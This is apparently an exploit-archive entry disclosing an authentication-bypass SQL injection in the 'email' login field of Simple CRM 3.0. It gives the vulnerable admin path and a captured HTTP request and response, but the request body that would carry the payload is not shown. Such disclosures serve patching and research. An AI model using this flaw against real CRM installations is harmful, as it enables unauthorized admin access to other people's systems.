Simple CRM 3.0 SQL Injection

Simple CRM version 3.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | c413b1275c36f8438234edaf61eec800

# Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) 
# Date: 22/06/2021
# Exploit Author: Rinku Kumar (rinku191)
# Vendor Homepage:
# Software Link:
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.

Vulnerable Page: /crm/admin/

POST /scrm/crm/admin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Connection: close
Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14
Upgrade-Insecure-Requests: 1



HTTP/1.1 200 OK
Date: Tue, 22 Jun 2021 15:53:00 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33
X-Powered-By: PHP/7.2.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8


Related Posts